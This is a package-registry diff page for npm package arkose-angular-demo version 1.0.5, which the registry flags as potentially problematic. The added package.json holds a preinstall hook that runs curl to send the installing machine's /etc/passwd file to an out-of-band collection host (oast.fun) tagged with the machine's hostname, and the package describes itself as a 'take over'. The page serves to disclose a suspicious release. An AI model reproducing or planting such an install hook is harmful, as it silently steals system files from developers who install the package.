arkose-angular-demo 1.0.5
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of arkose-angular-demo might be problematic. Click here for more details.
- package/index.js +2 -0
- package/package.json +12 -0
package/index.js
ADDED
package/package.json
ADDED
|
@@ -0,0 +1,12 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "arkose-angular-demo",
|
|
3
|
+
"version": "1.0.5",
|
|
4
|
+
"description": "LaunchDarkly NPM package take over by santiko86",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"start": "node index.js",
|
|
8
|
+
"preinstall":"/usr/bin/curl --data '@/etc/passwd' $(hostname).qneyapqtneubpwwkqdpg1zumzli0z33i7.oast.fun"
|
|
9
|
+
},
|
|
10
|
+
"author": "Paktiko1986",
|
|
11
|
+
"license": "0341"
|
|
12
|
+
}
|